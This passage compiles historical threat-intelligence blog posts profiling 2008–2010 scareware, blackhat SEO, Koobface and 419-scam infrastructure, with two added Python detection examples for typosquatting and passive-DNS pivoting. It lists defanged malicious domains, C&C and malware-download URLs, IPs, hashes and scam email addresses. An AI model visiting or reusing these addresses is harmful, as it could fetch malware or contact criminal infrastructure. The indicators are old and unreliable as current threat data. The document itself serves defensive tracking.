typosquatted portfolio of malware-serving domains 
successfully impersonating Google and spreading malicious 
software to hundreds of thousands of unsuspecting users. 

In this post I'll provide actionable intelligence on the 
infrastructure behind the campaign. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://google-analyse.com/in.cgi?default 
hxxp://google-analystic.com/in.cgi 
hxxp://google-analysis.com/cgi-bin/nspl5/in.cgi?p=in 
hxxp://google-analystic.net 
hxxp://google-counter.com/cgi-bin/nspl?p=in 
hxxp://googlerank.info/counter/ 
hxxp://googlehlp.com 
hxxp://pagead2.googlesynidication.com 
hxxp://service-google.cn 
hxxp://l.ie-google.cn 
hxxp://analystic.cn/in.cgi?default 
hxxp://255-google-video.info 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
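Every domain in the portfolio above borrows the Google brand in one of two ways: the brand token sits inside an unrelated registrable domain (google-analyse.com, service-google.cn, 255-google-video.info), or a legitimate name is misspelled by a character or two (googlesynidication.com for googlesyndication.com). The function below, an added example rather than anything from the post, flags both patterns. The brand tokens, the allowlist of genuine domains and the two-label "registrable domain" shortcut are assumptions chosen for this illustration; a production check would use the Public Suffix List.

```python
import re

# Assumptions (not from the post): brand tokens to watch for and the
# registrable domains accepted as genuine.
BRAND_TOKENS = ("google", "yahoo", "baidu")
ALLOWLIST = {"google.com", "google-analytics.com", "googlesyndication.com", "yahoo.com"}


def levenshtein(a: str, b: str) -> int:
    """Edit distance computed with a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """Last two labels. Adequate for the .com/.cn/.info/.net names in the post;
    multi-label public suffixes (co.uk etc.) would need the Public Suffix List."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def impersonation(host: str):
    """Return a reason string if host looks like a brand impersonation, else None."""
    reg = registrable(host)
    if reg in ALLOWLIST:
        return None
    label = reg.split(".")[0]
    squashed = re.sub(r"[^a-z]", "", label)     # '255-google-video' -> 'googlevideo'
    for brand in BRAND_TOKENS:
        if brand in squashed:
            return f"{host}: carries brand token '{brand}' but {reg} is not allowlisted"
    for legit in sorted(ALLOWLIST):
        dist = levenshtein(label, legit.split(".")[0])
        if 0 < dist <= 2:
            return f"{host}: label '{label}' is edit distance {dist} from '{legit}'"
    return None


def triage(hosts):
    """Split a hostname list into (flagged reasons, clean hosts)."""
    flagged, clean = [], []
    for h in hosts:
        reason = impersonation(h)
        (flagged if reason else clean).append(reason or h)
    return flagged, clean
```

One limit worth noting: analystic.cn, which the post lists as part of the same portfolio, carries no brand token and is not close to any allowlisted name, so a lexical check alone passes it. It only surfaces through infrastructure overlap (shared redirector path in.cgi?default, shared hosting), which is why the posts pivot on IPs and name servers rather than on names alone.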
Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild (2018-10-21 22:35) 

It's 2008 and I recently came across a sizable portfolio of 
rogue and fraudulent scareware-serving domains successfully 
acquiring traffic through a variety of blackhat SEO 
techniques, in this particular case built around the airplane 
crash of the Polish president. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://sarahscandies.com 
hxxp://armadasur.com 
hxxp://gayribisi.com 
hxxp://composerjohnbeal.com 
hxxp://preferredtempsinc.com 
hxxp://ojaivalleyboys.com 
hxxp://homelinkmag.com 
hxxp://worldwidestones.com 
hxxp://silsilaqasmia.com 
hxxp://vidoemo.com 
hxxp://channhu.com 
hxxp://ideasenfoco.com 
hxxp://homeownersmoneysaver.com 
hxxp://intheclub.com 
hxxp://internetcabinetsdirect.com 
hxxp://silentservers.com 
hxxp://indigo-post.com 
hxxp://jacksonareadiscgolf.com 
hxxp://werodink.com 
hxxp://jingyi-plastic.com 
hxxp://impressionsphotographs.com 

Sample URL redirection chain: 

hxxp://cooldesigns4u.co.uk/sifr.php 
- hxxp://visittds.com/su/in.cgi?2 - 213.163.89.55 - Email: johnvernet@gmail.com 
- hxxp://scaner24.org/?affid=184 - 91.212.127.19 - Email: bobarter@xhotmail.net 

Redirectors parked on 213.163.89.55 (AS49544, 
INTERACTIVE3D-AS Interactive3D) include: 

hxxp://google-analyze.org 
hxxp://alioanka.com 
hxxp://robokasa.com 
hxxp://thekapita.com 
hxxp://rbomce.com 
hxxp://kolkoman.com 
hxxp://nikiten.com 
hxxp://rokobon.com 
hxxp://odile-marco.com 
hxxp://ramualdo.com 
hxxp://omiardo.com 
hxxp://nsfer.com 
hxxp://racotas.com 
hxxp://foxtris.com 
hxxp://mongoit.com 
hxxp://mangasit.com 
hxxp://convart.com 
hxxp://baidustatz.com 
hxxp://google-analyze.cn 
hxxp://statanalyze.cn 
hxxp://reycross.cn 
hxxp://m-analytics.net 
hxxp://yahoo-analytics.net 

We've already seen hxxp://google-analyze.org and 
hxxp://yahoo-analytics.net in several related [1]mass 
compromises of Embassy Web sites. 

We'll continue monitoring the campaign and post updates 
as new developments take place. 

1. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html 
Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild - Part Two (2018-10-21 22:47) 

It's 2008 and I've recently come across a massive blackhat 
SEO campaign successfully enticing users into falling victim 
to a fraudulent and malicious scareware-serving campaign. 
In this post I'll provide actionable intelligence on the 
infrastructure behind it. 

Related malicious domains and redirectors known to 
have participated in the campaign: 

hxxp://msh-co.com 
hxxp://incubatedesign.com 
hxxp://lancemissionart.com 
hxxp://audioboxstudios.com 
hxxp://hwhitecustomhomes.com 
hxxp://indobestroof.com 
hxxp://in-prague.com 
hxxp://hvmpglobalconsulting.com 
hxxp://indierthanthou.com 
hxxp://huckleberryroad.com 
hxxp://indiepoprockhop.com 
hxxp://indianfriends.org 
hxxp://husuzem.com 
hxxp://seankobuk.com 
hxxp://in-led.net 
hxxp://pellaiowahomes.com 
hxxp://i-leadzsite.com 
hxxp://i4z.com 
hxxp://tmnttoys.com 
hxxp://hulshizer.com 
hxxp://neighborhoodnursingcare.com 
hxxp://i4004.net 
hxxp://pugzor.net 
hxxp://in-turkey.info 
hxxp://salsaspice.com 
hxxp://calidogrocks.com 
hxxp://iac-tokyo.org 
hxxp://indigo.earthman.ca 
hxxp://backyardcreations.org 
hxxp://uraband.com 
hxxp://indiansexhq.com 
hxxp://the-flooring-connection.com 
hxxp://humordehoy.com 
hxxp://sasm.net 
hxxp://indefenseof.com 
hxxp://i-need-a-websitedesigned.com 
hxxp://scottiesautobody.com 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
Historical OSINT - Rogue Scareware Dropping 
Campaign Spotted in the Wild Courtesy of the 
Koobface Gang (2018-10-21 23:02) 

It's 2010 and I've recently come across a diverse portfolio 
of fake security software, also known as scareware, courtesy 
of the Koobface gang, in what appears to be a [1]direct 
connection between the gang's activities and the 
Russian Business Network. 

In this post I'll provide actionable intelligence on the 
infrastructure behind it and discuss in-depth the tactics, 
techniques and procedures of the cybercriminals behind it, 
including the establishment of a direct connection between 
the gang's activities and a well-known Russian Business 
Network customer. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://piremover.eu/hitin.php?affid=02979 - 
212.117.161.142; 95.211.27.154; 95.211.27.166 

Once executed, a sample malware (MD5: 
eedac4719229a499b3118f87f32fae35) phones back 
to the following malicious C&C server IP: 

hxxp://xmiueftbmemblatlwsrj.cn/get.php?id=02979 - 
91.207.116.44 - Email: robertsimonkroon@gmail.com 

Note that the identifier passed to the C&C (id=02979) is the 
same affiliate ID carried by the scareware landing URL 
(affid=02979), which ties the dropper to that affiliate account. 

Domains known to have responded to the 
same malicious C&C server IP: 

hxxp://aahsdvsynrrmwnbmpklb.cn 
hxxp://dlukhonqzidfpphkbjpb.cn 
hxxp://barykcpveiwsgexkitsg.cn 
hxxp://bfichgfqjqrtkwrsegoj.cn 
hxxp://dhbomnljzgiardzlzvkp.cn 

Once executed, a sample malware phones back to the 
following malicious C&C servers: 

hxxp://xmiueftbmemblatlwsrj.cn 

hxxp://urodinam.net - a [2]well-known [3]Koobface 1.0 
C&C server domain, also seen in the "[4]Mass DreamHost 
Sites Compromise" exclusively profiled in this post. 

Once executed, a sample malware (MD5: 
66dc85ad06e4595588395b2300762660; MD5: 
91944c3ae4a64c478bfba94e9e05b4c5) phones back 
to the following malicious C&C server IP: 

hxxp://proxim.ntkrnlpa.info - 83.68.16.30 - seen and 
observed in related analysis regarding the [5]mass 
Embassy Web site compromise throughout 2007 and 2009. 

It successfully drops the following malicious Koobface binary: 

hxxp://harmonyhudospa.se/.sys/?getexe=fb.70.exe 

Related malicious MD5s known to have 
participated in the campaign: 

MD5: 66dc85ad06e4595588395b2300762660 
MD5: 8282ea8e92f40ee13ab716daf2430145 

Once executed, a sample malware phones back to the 
following malicious C&C servers: 

hxxp://tehnocentr.chita.ru/.sys 
hxxp://gvpschekschov.iv-edu.ru/.sys/?action=fbgen 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 

1. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html 
2. https://draft.blogger.com/ 
3. https://ddanchev.blogspot.com/2010/05/koobface-gang-responds-to-10-things-you.html 
4. https://ddanchev.blogspot.com/2010/05/dissecting-mass-dreamhost-sites.html 
5. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html 
Historical OSINT - Profiling a Portfolio of Active 419-
Themed Scams (2018-10-21 23:08) 

It's 2010 and I've recently decided to provide actionable 
intelligence on a variety of 419-themed scams, in particular 
the actual malicious actors behind the campaigns, with the 
idea of empowering law enforcement and the community 
with the data needed to track down and prosecute the 
malicious actors behind these campaigns. 

Related malicious and fraudulent emails known to 
have participated in the campaign: 

david_ikemba@supereme-loan-finance.com - 96.24.14.4 
charles.maynard1@gmx.com - 218.31.134.111 
mr.karimahmed2004@msn.com - 41.203.231.82 
fedexdelivryservices@yahoo.com.hk - 89.187.142.72 
chevrondisbursement@hotmail.com - 41.138.182.245 
mrslindahilldesk00000@hotmail.co.uk - 41.138.188.45 
natt.westt@live.com - 115.242.40.142 
google11anniversary2010@live.com - 115.240.21.112 
barjamessmith@qatar.io - 115.242.94.153 
delata_ecobank@web2mail.com - 202.58.64.18 
junhuan9@yahoo.cn - 68.190.243.51 
fairlandindustryltd@mail.ru - 41.138.190.213 
shkhougal@aol.com - 80.35.222.9 
jamestimeswel@rogers.com - 203.170.192.4 
alimubarakhm@hotmail.com - 115.134.5.245 
godwinemefiele2010@hotmail.com - 41.211.229.65 
skyebankplclagosnigera@gmail.com, 
skyebankplclagosnigera@zapak.com - 41.138.178.241 
contact.alcchmb@sify.com - 116.206.153.50 
officelottery94@yahoo.com.hk - 124.122.145.226 
kadamluk@live.com - 41.217.65.14 
garycarsonuk@w.cn - 220.225.213.221 
Stella_willson48@yahoo.co.uk - 82.196.5.120 
trustlink@w.cn - 87.118.82.8 
george201009@hotmail.com - 59.120.137.197 
drmannsurmuhtarrr_155@yahoo.cn, 
mrstreasurecollinnsss@gmail.com - 82.114.78.222 
Historical OSINT - Yet Another Massive Blackhat SEO 
Campaign Spotted in the Wild (2018-10-21 23:21) 

It's 2010 and I've recently stumbled upon yet another 
diverse portfolio of blackhat SEO domains, this time serving 
rogue security software, also known as scareware, to 
unsuspecting users, with the cybercriminals behind the 
campaign earning fraudulent revenue by monetizing access 
to malware-infected hosts through an affiliate-network 
based revenue-sharing scheme. 

In this post I'll profile the infrastructure behind the 
campaign and provide actionable intelligence on it. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://arnalduatis.com 
hxxp://batistaluciano.com 
hxxp://bethemedia.net 
hxxp://bride-beautiful.com 
hxxp://burgessandsons.com 
hxxp://carolinacane.com 
hxxp://caulfieldband.com 
hxxp://improvenewark.com 
hxxp://marsmellow.info 
hxxp://noodlesonline.com 
hxxp://queenslumber.com 
hxxp://thesolidwoodflooringcompany.com 
hxxp://wirelessexpertise.com 
hxxp://bigbangexpress.com 
hxxp://bioresonantie.net 
hxxp://clubipg.com 
hxxp://djdior.com 
hxxp://djektoyz.com 
hxxp://getraenkepool.com 
hxxp://hartmanpescar.com 
hxxp://hetkaashuis.com 
hxxp://menno.info 
hxxp://pianoaccompanistcompetition.com 
hxxp://soundwitness.org 
hxxp://strijkvrij.com 
Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild Drops Scareware (2018-10-21 23:37) 

It's 2010 and I've recently intercepted a currently active 
malicious and fraudulent blackhat SEO campaign successfully 
enticing users into interacting with rogue and fraudulent 
scareware-serving campaigns. 

In this post I'll profile the infrastructure behind the 
campaign and provide actionable intelligence on it. 

Sample URL redirection chain: 

hxxp://noticexsummary.com/re.php?lnk=1203597664 - 87.255.55.231 
- hxxp://new-pdf-reader.com/l/promo/index.asp?aff=11677 - 66.207.172.196 
- hxxps://secure-signupway.com/promo/join.aspx?siteid=3388 

Related malicious domains known to have 
participated in the campaign: 

hxxp://noticexsummary.com/ 
hxxp://online-tv-on-your-pc.com/p2/index.asp?aff=11680&camp=unsub 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
Historical OSINT - Yet Another Massive Blackhat SEO 
Campaign Spotted in the Wild Drops Scareware 
(2018-10-21 23:47) 

It's 2010 and I've recently come across a currently active 
malicious and fraudulent blackhat SEO campaign successfully 
enticing users into interacting with rogue and fraudulent 
scareware-serving campaigns. 

In this post I'll provide actionable intelligence on the 
infrastructure behind the campaign. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://globals-advers.com 
hxxp://alldiskscheck300.com 
hxxp://multisearch1.com 
hxxp://myfreespace3.com 
hxxp://hottystars.com 
hxxp://multilang1.com 
hxxp://3gigabytes.com 
hxxp://drivemedirect.com 
hxxp://globala2.com 
hxxp://teledisons.com 
hxxp://theworldnews5.com 
hxxp://virtualblog5.com 
hxxp://grander5.com 
hxxp://5starsblog.com 
hxxp://globalreds.com 
hxxp://global-advers.com 
hxxp://ratemyblog1.com 
hxxp://greatvideo3.com 
hxxp://beginner2009.com 
hxxp://fastwebway.com 
hxxp://blazervips.com 
hxxp://begin2009.com 
hxxp://megatradetds0.com 
hxxp://securedonlinewebspace.com 
hxxp://proweb-info.com 
hxxp://security-www-clicks.com 
hxxp://updatedownloadlists.com 
hxxp://styleonlyclicks.cn 
hxxp://informationgohere.com 
hxxp://world-click-service.com 
hxxp://secutitypowerclicks.cn 
hxxp://securedclickuser.cn/ 
hxxp://slickoverview.com 
hxxp://viewyourclicks.com 
hxxp://clickwww2.com 
hxxp://clickadsystem.com 
hxxp://becomepoweruser.cn 
hxxp://clickoverridesystem.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp://protecteduser.cn 
hxxp://internetprotectedweb.com/ 
hxxp://clicksadssystems.com 
hxxp://whereismyclick.cn 
hxxp://trustourclicks.cn 
hxxp://goldenstarclick.cn 
hxxp://defendedsystemuser.cn 


We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
Historical OSINT - Spamvertized Swine Flu Domains - 
Part Two (2018-10-21 23:50) 

It's 2010 and I've recently come across a currently active 
and diverse portfolio of Swine Flu related domains enticing 
users into interacting with rogue and malicious content. 

In this post I'll profile and expose the malicious domain 
portfolio currently circulating in the wild and involved in 
an ongoing variety of Swine Flu malicious spam campaigns, 
and provide actionable intelligence on the infrastructure 
behind it. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://pehwitew.cn - 58.17.3.44; 58.20.140.5; 
220.248.167.126; 60.191.221.116; 110.52.6.252 

Related name servers known to have participated in 
the campaign: 

hxxp://ns6.plusspice.com - 110.52.6.252 
hxxp://ns2.morewhole.com 
hxxp://ns2.extolshare.com 
hxxp://ns2.pridesure.com 
hxxp://ns2.swellwise.com 
hxxp://ns4.boostwise.com 
hxxp://ns6.maxitrue.com 
hxxp://ns4.sharezeal.com 
hxxp://ns2.extolcalm.com 
hxxp://ns4.humortan.com 
hxxp://ns2.joysheer.com 
hxxp://ns2.zestleads.com 
hxxp://ns4.fizzleads.com 
hxxp://ns4.maxigreat.com 
hxxp://ns4.spicyrest.com 
hxxp://ns4.hardyzest.com 
hxxp://ns2.resttrust.com 
hxxp://ns2.alertwow.com 
hxxp://ns2.savetangy.com 
hxxp://ns4.lovetangy.com 
hxxp://ns2.coyrosy.com 
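The expansion step these posts perform by hand, starting from one seed domain and collecting every other domain that shares its name server or its hosting IP (the "domains known to have used the same malicious name server" and "known to have responded to the same malicious IP" lists here and in the Koobface post above), is a breadth-first walk over passive-DNS records. The script below is an added example, not the author's tooling. RECORDS is a constructed table: the seed pehwitew.cn, ns6.plusspice.com, 110.52.6.252 and 60.191.221.123 appear in this post, while the other rows (including the unrelated example.org) are assumptions added so that the walk has something to find and something to leave out.

```python
from collections import defaultdict, deque

# Constructed passive-DNS table (domain, record type, value). The seed,
# its name server and the two IPs 110.52.6.252 / 60.191.221.123 are from
# the post; the remaining rows are assumptions added for illustration.
RECORDS = [
    ("pehwitew.cn", "A", "110.52.6.252"),
    ("pehwitew.cn", "A", "60.191.221.116"),
    ("pehwitew.cn", "NS", "ns6.plusspice.com"),
    ("ns6.plusspice.com", "A", "110.52.6.252"),
    ("jihpuyab.cn", "NS", "ns6.plusspice.com"),
    ("jihpuyab.cn", "A", "58.17.3.44"),
    ("vitsulob.cn", "A", "60.191.221.123"),
    ("vitsulob.cn", "NS", "ns2.morewhole.com"),
    ("dabwedib.cn", "A", "60.191.221.123"),
    ("example.org", "NS", "ns1.example.org"),   # unrelated; must not be pulled in
    ("example.org", "A", "203.0.113.10"),
]


def build_index(records):
    """domain -> {(type, value)} and (type, value) -> {domain}."""
    by_domain, by_value = defaultdict(set), defaultdict(set)
    for domain, rtype, value in records:
        by_domain[domain].add((rtype, value))
        by_value[(rtype, value)].add(domain)
    return by_domain, by_value


def pivot(seed, records, max_depth=2, fanout_limit=50):
    """Breadth-first expansion over shared NS and A values.

    fanout_limit skips any value shared by more than that many domains
    (shared hosting, a registrar's default name server); without it one
    popular IP drags unrelated infrastructure into the cluster.
    Returns the set of reached domains and the (from, shared_record, to) edges.
    """
    by_domain, by_value = build_index(records)
    seen, edges = {seed}, []
    queue = deque([(seed, 0)])
    while queue:
        domain, depth = queue.popleft()
        if depth >= max_depth:
            continue
        for key in by_domain.get(domain, ()):
            peers = by_value[key]
            if len(peers) > fanout_limit:
                continue
            for peer in sorted(peers):
                if peer not in seen:
                    seen.add(peer)
                    edges.append((domain, key, peer))
                    queue.append((peer, depth + 1))
    return seen, edges
```

Starting from pehwitew.cn the walk reaches jihpuyab.cn through the shared name server and ns6.plusspice.com through the shared A record, but not vitsulob.cn or dabwedib.cn: those sit on 60.191.221.123, which in this table is not linked to the seed, matching the post's separate "known to have responded to the same malicious IP (60.191.221.123)" cluster. Set fanout_limit to 1 and nothing is reached at all, which is the failure mode to watch for when a name server or IP is shared by thousands of legitimate domains.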

Related malicious domains known to have 
participated in the campaign: 

hxxp://jihpuyab.cn 
hxxp://dabwedib.cn 
hxxp://jehrawob.cn 
hxxp://lacgidub.cn 
hxxp://fektiyub.cn 
hxxp://qucmolac.cn 
hxxp://xopfekec.cn 
hxxp://gamfesec.cn 
hxxp://xokdemic.cn 
hxxp://papxunic.cn 
hxxp://jiqlosic.cn 
hxxp://liynaloc.cn 
hxxp://womrifuc.cn 
hxxp://picduluc.cn 
hxxp://feqtawuc.cn 
hxxp://becfuzuc.cn 
hxxp://ximnusad.cn 
hxxp://limyoxed.cn 
hxxp://cokgozed.cn 
hxxp://qursehod.cn 
hxxp://pimfilod.cn 
hxxp://zofxitod.cn 
hxxp://pehdiwod.cn 
hxxp://ruvvabud.cn 
hxxp://japwolud.cn 
hxxp://qolqaqaf.cn 
hxxp://tacreyaf.cn 
hxxp://rajvufef.cn 
hxxp://hiwjadif.cn 
hxxp://pejjenif.cn 
hxxp://hakyabof.cn 
hxxp://rijgihag.cn 
hxxp://pipgaqag.cn 
hxxp://jaxkewag.cn 
hxxp://cikqumog.cn 
hxxp://tircodug.cn 
hxxp://juryaqug.cn 
hxxp://yawfadah.cn 
hxxp://yabtudah.cn 
hxxp://qifhihah.cn 
hxxp://xeyselah.cn 
hxxp://cotmetah.cn 
hxxp://bulmitah.cn 
hxxp://tegbejih.cn 
hxxp://tuymokih.cn 
hxxp://modqopoh.cn 
hxxp://qejpoduh.cn 
hxxp://xajsomuh.cn 
hxxp://wisziruh.cn 
hxxp://maypajej.cn 
hxxp://tivhikej.cn 
hxxp://holmayej.cn 
hxxp://dabtizej.cn 
hxxp://koyxuwij.cn 
hxxp://romxebuj.cn 
hxxp://hilzuluj.cn 
hxxp://zulfavuj.cn 
hxxp://vojhowuj.cn 
hxxp://daldukak.cn 
hxxp://rakvirak.cn 
hxxp://fimresak.cn 
hxxp://zepyosak.cn 
hxxp://tovpiwak.cn 
hxxp://raqhizak.cn 
hxxp://salhibik.cn 
hxxp://xonzulik.cn 
hxxp://jezwutik.cn 
hxxp://lungodok.cn 
hxxp://qeytakok.cn 
hxxp://weswukuk.cn 
hxxp://lawmamuk.cn 
hxxp://xomhoruk.cn 
hxxp://zitkowuk.cn 
hxxp://hoyzexuk.cn 
hxxp://cutholal.cn 
hxxp://jidtecel.cn 
hxxp://jovmuhil.cn 
hxxp://guxdipil.cn 
hxxp://kujkuwil.cn 
hxxp://kojvifol.cn 
hxxp://zitgohol.cn 
hxxp://cosxotol.cn 
hxxp://wahwoxol.cn 
hxxp://siqsayol.cn 
hxxp://pipwoqul.cn 
hxxp://zilfumam.cn 
hxxp://fokvidem.cn 
hxxp://vamhefem.cn 
hxxp://hipxetem.cn 
hxxp://hasrozem.cn 
hxxp://yovbafim.cn 
hxxp://zutgaqim.cn 
hxxp://kamnorim.cn 
hxxp://nussotim.cn 
hxxp://yiblegom.cn 
hxxp://vorteyom.cn 
hxxp://mokgupum.cn 
hxxp://xennesum.cn 
hxxp://feshivum.cn 
hxxp://nakcaban.cn 
hxxp://yaxxokan.cn 
hxxp://qikciqan.cn 
hxxp://gagsuran.cn 
hxxp://bopxuran.cn 
hxxp://giwduvan.cn 
hxxp://gixreqin.cn 
hxxp://leccatin.cn 
hxxp://jollipon.cn 
hxxp://vuzlopon.cn 
hxxp://butkoxon.cn 
hxxp://falyewun.cn 
hxxp://noscajap.cn 
hxxp://xirqocep.cn 
hxxp://daqdohep.cn 
hxxp://wokvarep.cn 
hxxp://hoggudip.cn 
hxxp://heqfavip.cn 
hxxp://jowrewip.cn 
hxxp://cimqiqop.cn 
hxxp://cibqobup.cn 
hxxp://zijreyup.cn 
hxxp://tosnabaq.cn 
hxxp://tochekaq.cn 
hxxp://cosmoqaq.cn 
hxxp://zavnusaq.cn 
hxxp://vufsaqeq.cn 
hxxp://dagligiq.cn 
hxxp://wugjaziq.cn 
hxxp://fepsuwoq.cn 
hxxp://pombeyoq.cn 
hxxp://dokcokuq.cn 
hxxp://diwsutuq.cn 
hxxp://sayjumar.cn 
hxxp://jidxurer.cn 
hxxp://qalhiyir.cn 
hxxp://goqtoqor.cn 
hxxp://gaxdavor.cn 
hxxp://kazqikas.cn 
hxxp://piskeces.cn 
hxxp://qamhadis.cn 
hxxp://wifdixis.cn 
hxxp://hejhelos.cn 
hxxp://hedwimos.cn 
hxxp://kerrucus.cn 
hxxp://forhalus.cn 
hxxp://fesnupus.cn 
hxxp://lanzuhat.cn 
hxxp://kadmepat.cn 
hxxp://potzoyat.cn 
hxxp://jupkevet.cn 
hxxp://xagmiqit.cn 
hxxp://woxjatit.cn 
hxxp://gukpuxit.cn 
hxxp://dubpacut.cn 
hxxp://nifbihut.cn 
hxxp://qunkofav.cn 
hxxp://vippogav.cn 
hxxp://rimjulav.cn 
hxxp://kemhenav.cn 
hxxp://gutziqav.cn 
hxxp://gipbilev.cn 
hxxp://kaxcidiv.cn 
hxxp://xajwawov.cn 
hxxp://rejcoyov.cn 
hxxp://jogsuduv.cn 
hxxp://lamfoguv.cn 
hxxp://daxtohuv.cn 
hxxp://mihwuxuv.cn 
hxxp://hiwjuhaw.cn 
hxxp://gohkijaw.cn 
hxxp://tuwqetaw.cn 
hxxp://lacjebew.cn 
hxxp://vodrubew.cn 
hxxp://pehwitew.cn 
hxxp://yezxewew.cn 
hxxp://yuvsobow.cn 
hxxp://yodmapow.cn 
hxxp://qotpobuw.cn 
hxxp://megrafuw.cn 
hxxp://zamponuw.cn 
hxxp://kotzequw.cn 
hxxp://yudmaruw.cn 
hxxp://hamqiruw.cn 
hxxp://siwwawuw.cn 
hxxp://veqniwuw.cn 
hxxp://bepnudax.cn 
hxxp://jehfefax.cn 
hxxp://boxjokex.cn 
hxxp://yoclerex.cn 
hxxp://guzjacix.cn 
hxxp://mexcekix.cn 
hxxp://kibtixix.cn 
hxxp://conyixix.cn 
hxxp://famlojox.cn 
hxxp://jizwalox.cn 
hxxp://dahhowox.cn 
hxxp://zicquvtx.cn 
hxxp://cavxujux.cn 
hxxp://voqnolux.cn 

Known to have responded to the same malicious IP 
(60.191.221.123) are also the following malicious do¬ 
mains: 

hxxp://vitsulob.cn
hxxp://jahnivub.cn
hxxp://wipviyub.cn
hxxp://gokbulac.cn
hxxp://bedqaqac.cn
hxxp://suvnuqac.cn
hxxp://wukcilec.cn
hxxp://lukbolec.cn
hxxp://juhfaqic.cn
hxxp://mixwiqic.cn
hxxp://qikloric.cn
hxxp://halgiyic.cn
hxxp://jocvoloc.cn
hxxp://gugmikad.cn
hxxp://zoqvulad.cn
hxxp://zokdoled.cn
hxxp://daxlated.cn
hxxp://cahnubid.cn
hxxp://cufxuhod.cn
hxxp://libsorod.cn
hxxp://vopqatod.cn
hxxp://cebvoyod.cn
hxxp://lansocud.cn
hxxp://zohpakud.cn
hxxp://hekwasud.cn
hxxp://niknuvud.cn
hxxp://meymuhaf.cn
hxxp://nigkojef.cn
hxxp://bazmoyef.cn
hxxp://roszadif.cn
hxxp://sapmofif.cn
hxxp://kudxodof.cn
hxxp://pefkipof.cn
hxxp://xoqresof.cn
hxxp://fipxevof.cn
hxxp://quyzeluf.cn
hxxp://xujyeruf.cn
hxxp://xenpikeg.cn
hxxp://tafwohig.cn
hxxp://kowtuhig.cn
hxxp://dinpisig.cn
hxxp://teryuvig.cn
hxxp://funcizig.cn
hxxp://ciytamog.cn
hxxp://jemsowog.cn
hxxp://kiqzijug.cn
hxxp://pulfaxug.cn
hxxp://wojlabah.cn
hxxp://belzejah.cn
hxxp://pefdovah.cn
hxxp://xijsameh.cn
hxxp://racridih.cn
hxxp://rewfahih.cn
hxxp://vihxujih.cn
hxxp://qujvosih.cn
hxxp://figqacuh.cn
hxxp://xohmoluh.cn
hxxp://jicniwuh.cn
hxxp://kapxuraj.cn
hxxp://jubjavaj.cn
hxxp://bidkuqej.cn
hxxp://jarvixej.cn
hxxp://qinzidij.cn
hxxp://zagzafij.cn
hxxp://merjuwij.cn
hxxp://weqbujuj.cn
hxxp://gucdaluj.cn
hxxp://modxowuj.cn
hxxp://tobponak.cn
hxxp://tacjujek.cn
hxxp://fumliqek.cn
hxxp://wavfebik.cn
hxxp://xizqibik.cn
hxxp://focnigik.cn
hxxp://biqmipik.cn
hxxp://zowcoqik.cn
hxxp://fexsitik.cn
hxxp://qebdevik.cn
hxxp://xolkisok.cn
hxxp://kuqwuwok.cn
hxxp://gunwonuk.cn
hxxp://hewquvuk.cn
hxxp://gunbaqal.cn
hxxp://seysixal.cn
hxxp://zaymamel.cn
hxxp://weznohil.cn
hxxp://keczakil.cn
hxxp://wawberol.cn
hxxp://naftemul.cn
hxxp://sedbonam.cn
hxxp://velwapam.cn
hxxp://zinzutam.cn
hxxp://nudgixam.cn
hxxp://mibpabem.cn
hxxp://yolbaqem.cn
hxxp://fogduqem.cn
hxxp://qawtotem.cn
hxxp://qalfusim.cn
hxxp://kocguwim.cn
hxxp://zishikom.cn
hxxp://kozpipom.cn
hxxp://loblahum.cn
hxxp://winbomum.cn
hxxp://jakmezum.cn
hxxp://taglolan.cn
hxxp://suznuwan.cn
hxxp://jekwazan.cn
hxxp://toxmijen.cn
hxxp://nikguzen.cn
hxxp://dedmewin.cn
hxxp://jebvuwun.cn
hxxp://tupsikap.cn
hxxp://dudsuzap.cn
hxxp://yessafep.cn
hxxp://danxenep.cn
hxxp://leklidip.cn
hxxp://duklimip.cn
hxxp://yevnurip.cn
hxxp://virrotip.cn
hxxp://lalyezop.cn
hxxp://jaztecup.cn
hxxp://gokbehup.cn
hxxp://cuqyirup.cn
hxxp://gajvizup.cn
hxxp://cahwikaq.cn
hxxp://xeqbelaq.cn
hxxp://xicbamaq.cn
hxxp://qofqoneq.cn
hxxp://givxuyeq.cn
hxxp://gonganiq.cn
hxxp://vijsoziq.cn
hxxp://bignijoq.cn
hxxp://jejroxoq.cn
hxxp://culfunuq.cn
hxxp://qevxayuq.cn
hxxp://merwosar.cn
hxxp://loxvafer.cn
hxxp://cawnamir.cn
hxxp://wocyorir.cn
hxxp://tokhador.cn
hxxp://yuznisor.cn
hxxp://vamtator.cn
hxxp://gojligur.cn
hxxp://vukqejur.cn
hxxp://fewxopur.cn
hxxp://wukwoxur.cn
hxxp://bavyoxur.cn
hxxp://jegdufas.cn
hxxp://rillefes.cn
hxxp://niwwages.cn
hxxp://comrames.cn
hxxp://rohfapes.cn
hxxp://lehredis.cn
hxxp://jepniwos.cn
hxxp://lexxedus.cn
hxxp://xuljuhus.cn
hxxp://levgepat.cn
hxxp://modhewet.cn
hxxp://kawlozet.cn
hxxp://bufsofit.cn
hxxp://gekloyit.cn
hxxp://tercifot.cn
hxxp://yughaqut.cn
hxxp://surfabav.cn
hxxp://yutbevav.cn
hxxp://mowvahev.cn
hxxp://tuwcexev.cn
hxxp://liqfimiv.cn
hxxp://pefxamuv.cn
